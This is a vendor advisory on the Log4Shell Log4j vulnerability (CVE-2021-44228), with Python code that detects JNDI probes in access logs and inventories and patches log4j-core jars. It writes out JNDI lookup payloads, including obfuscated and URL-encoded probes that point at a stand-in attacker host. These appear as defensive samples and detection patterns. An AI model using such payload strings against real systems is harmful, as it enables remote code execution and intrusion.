
Apache Log4j Vulnerability - What you need to know

On 9 December 2021 a vulnerability was publicly disclosed in the Apache logging library Log4j 2 (versions 2.0-beta9 through 2.14.1). No Certero products, whether provisioned on-premises or as SaaS, are affected by this vulnerability. Certero can, however, be used to rapidly identify systems that are.


What is the Apache Log4j Vulnerability?

Tracked as CVE-2021-44228 and rated critical (CVSS 10.0), this remote code execution (RCE) vulnerability stems from Log4j 2 performing JNDI lookups on strings of the form ${jndi:ldap://attacker-host/x} wherever they appear in a logged message. An attacker who can get such a string logged, for example through an HTTP User-Agent header or a form field, can make the application fetch and execute attacker-controlled code, and from there take control of the host, install malware or harvest data.


What is the Impact?

Log4j 2 is commonly used to log activity within applications and is included in Apache frameworks including:

  • Apache Struts2
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • Apache Swift

Due to its widespread use, a substantial number of systems are affected. Any system or service that uses Apache Log4j 2 between versions 2.0-beta9 and 2.14.1 is affected, which includes many services and applications written in Java.

Microsoft has stated that the bulk of attacks they have observed at this time have been ‘related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers’.
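The probes behind that mass scanning show up in web-server access logs as the lookup string described above, often URL-encoded or wrapped in nested lookups such as ${lower:j} or ${::-j} to evade simple substring matches. The following is an added example, not part of the original page and not Certero's or Apache's code, of detection logic that normalizes those evasions and then matches the JNDI lookup. The log lines are constructed for the example, and the set of evasion lookups it resolves (lower, upper and the default-value trick) is an assumption based on probes commonly reported at the time, not an exhaustive list.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server access log (not real traffic): one benign request,
# then three Log4Shell probes of increasing obfuscation in the User-Agent or path.
SAMPLE_LOG = r"""
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
198.51.100.9 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.9:1389/b}"
198.51.100.9 - - [10/Dec/2021:14:02:23 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
"""

# Innermost ${...} lookup (no nested $, { or } inside); resolved first, inside-out, as Log4j does.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup using one of the protocols seen in probes (assumed list, not exhaustive).
JNDI_RE = re.compile(
    r"\$\{\s*jndi:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?)://[^}]*\}",
    re.IGNORECASE,
)


def _resolve_inner(match):
    """Evaluate the obfuscation lookups seen in probes; leave the jndi lookup itself alone."""
    body = match.group(1)
    key, sep, rest = body.partition(":")
    if sep and key.lower() == "lower":
        return rest.lower()                      # ${lower:J} -> j
    if sep and key.lower() == "upper":
        return rest.upper()                      # ${upper:n} -> N
    if ":-" in body and not body.lower().startswith("jndi:"):
        return body.rsplit(":-", 1)[1]           # ${env:NOPE:-j} or ${::-j} -> j
    return match.group(0)                        # a real lookup: keep it as-is


def normalize(text, max_rounds=10):
    """URL-decode and resolve nested lookups inside-out until nothing changes (bounded)."""
    for _ in range(max_rounds):
        resolved = LOOKUP_RE.sub(_resolve_inner, unquote(text))
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_probes(log_text):
    """Return one record per log line that carries a ${jndi:...} lookup after normalization."""
    hits = []
    for lineno, line in enumerate(log_text.strip().splitlines(), start=1):
        normalized = normalize(line)
        for m in JNDI_RE.finditer(normalized):
            hits.append({"line": lineno, "payload": m.group(0), "raw": line})
    return hits


if __name__ == "__main__":
    for hit in find_jndi_probes(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['payload']}")
```

Run it over your own access, proxy or WAF logs by passing their contents to find_jndi_probes; a hit only proves a probe was received, not that the application logged the string with a vulnerable Log4j, so follow up with the host-side inventory checks described in the mitigation section.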

Version 1 of the Log4j library is no longer supported and is affected by multiple security vulnerabilities. Developers should migrate to the latest version of Log4j 2.


What can I do to mitigate the risk?

The UK National Cyber Security Centre (NCSC) advised the following steps to mitigate the risk:

  • If you use the Log4j 2 library as a dependency in an application you have developed, update to version 2.15.0 or later. Note that 2.15.0 was itself followed by further fixes (2.16.0, 2.17.0 and 2.17.1 address CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 respectively), so target the latest 2.x release rather than 2.15.0 specifically.
  • If you use an affected third-party application, keep the product updated to the latest version the vendor provides.
  • Where updating is not immediately possible, releases 2.10 and later can be mitigated by setting the system property log4j2.formatMsgNoLookups (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS) to true, and any affected release can be mitigated by removing the JndiLookup class from the classpath. Apache later withdrew the formatMsgNoLookups advice because it does not cover every vulnerable configuration, so prefer removing the class if you cannot upgrade.
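To apply those steps on a host you first need to know which jars contain log4j-core, what version they are, and whether the JndiLookup class is still present. The following is an added example, in Python, and is not Certero's tooling or Apache's code: it walks a directory tree for jars, reads the Log4j version from the jar's pom.properties or manifest, classifies each jar, and implements the class-removal workaround (the same effect as Apache's published command `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`). The entry names and version metadata locations are assumed to match real log4j-core releases; the jars it scans in demo() are constructed stand-ins with placeholder class bytes so the example runs offline.

```python
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"
MANIFEST_VERSION_RE = re.compile(r"^Implementation-Version:\s*(\S+)", re.MULTILINE)
POM_VERSION_RE = re.compile(r"^version=(\S+)", re.MULTILINE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are dropped."""
    numbers = [int(n) for n in text.split("-")[0].split(".") if n.isdigit()]
    return tuple((numbers + [0, 0, 0])[:3])


def _read_version(z):
    """Version from log4j-core's pom.properties, falling back to the manifest; None if absent."""
    for name in z.namelist():
        if name.startswith("META-INF/maven/org.apache.logging.log4j/log4j-core/") and name.endswith("pom.properties"):
            m = POM_VERSION_RE.search(z.read(name).decode("utf-8", "replace"))
            if m:
                return m.group(1)
    if "META-INF/MANIFEST.MF" in z.namelist():
        m = MANIFEST_VERSION_RE.search(z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
        if m:
            return m.group(1)
    return None


def assess_jar(jar_path):
    """Classify one jar: vulnerable / mitigated / fixed / log4j-1.x-eol / not-log4j-core."""
    with zipfile.ZipFile(jar_path) as z:
        names = set(z.namelist())
        version = _read_version(z)
    jndi_present = JNDI_CLASS in names
    if any(n.startswith(CORE_PREFIX) for n in names):
        if version and parse_version(version) >= (2, 15, 0):
            status = "fixed"        # CVE-2021-44228 fixed; still move to the latest 2.x release
        elif not jndi_present:
            status = "mitigated"    # JndiLookup removed from the classpath
        else:
            status = "vulnerable"
    elif any(n.startswith("org/apache/log4j/") for n in names):
        status = "log4j-1.x-eol"    # unsupported 1.x branch; migrate to current Log4j 2
    else:
        status = "not-log4j-core"
    return {"version": version, "jndi_lookup_present": jndi_present, "status": status}


def scan_tree(root):
    """Assess every *.jar under root (does not look inside fat jars or WARs that nest log4j-core)."""
    return {path: assess_jar(path) for path in Path(root).rglob("*.jar")}


def remove_jndi_lookup(jar_path):
    """Rewrite the jar without the JndiLookup entry (same effect as `zip -q -d <jar> <class>`)."""
    jar_path = Path(jar_path)
    tmp = jar_path.with_name(jar_path.name + ".tmp")
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    tmp.replace(jar_path)


def build_sample_jar(path, version, include_jndi=True):
    """Constructed stand-in for log4j-core: real entry names, placeholder class bytes."""
    path = Path(path)
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        z.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties", f"version={version}\n")
        z.writestr(CORE_PREFIX + "Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Scan a constructed tree, apply the class-removal workaround, rescan; return both results."""
    root = Path(tempfile.mkdtemp(prefix="log4j-scan-"))
    vulnerable = root / "app" / "lib" / "log4j-core-2.14.1.jar"
    build_sample_jar(vulnerable, "2.14.1")
    build_sample_jar(root / "app" / "lib" / "log4j-core-2.15.0.jar", "2.15.0")
    before = {p.name: r["status"] for p, r in scan_tree(root).items()}
    remove_jndi_lookup(vulnerable)
    after = {p.name: r["status"] for p, r in scan_tree(root).items()}
    return {"before": before, "after": after}


if __name__ == "__main__":
    print(demo())
```

Point scan_tree at a real application directory to inventory it. Two caveats: the class removal is undone whenever the jar is reinstalled or redeployed, so treat it as a stopgap until the upgrade lands; and log4j-core is frequently shaded into fat jars or packed inside WAR and EAR files, which this walker does not open, so unpack those (or extend the check to recurse into nested archives) before trusting a clean result.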


How Certero can help – Visibility

Application vendors are releasing patches or workarounds for their products, so please follow each manufacturer's own guidance to mitigate the vulnerability.

Certero can identify installations of Log4j on Linux devices by means of a dynamic group. It can also identify systems where Apache software is installed, which can then be further interrogated for vulnerable versions of Log4j. For assistance, please contact Certero through the Customer Center.


Certero’s Commitment to Security

Security remains of paramount importance to Certero, as demonstrated by maintaining both ISO 27001 and Cyber Essentials Plus certification for all Certero products and services. Certero's commitment to creating best-of-breed, secure solutions is baked into our development philosophy of keeping all solution development in-house within Certero and freeing customers from the burden and risks of legacy technology.

For more information contact Certero today and for regular updates, follow Certero on LinkedIn.
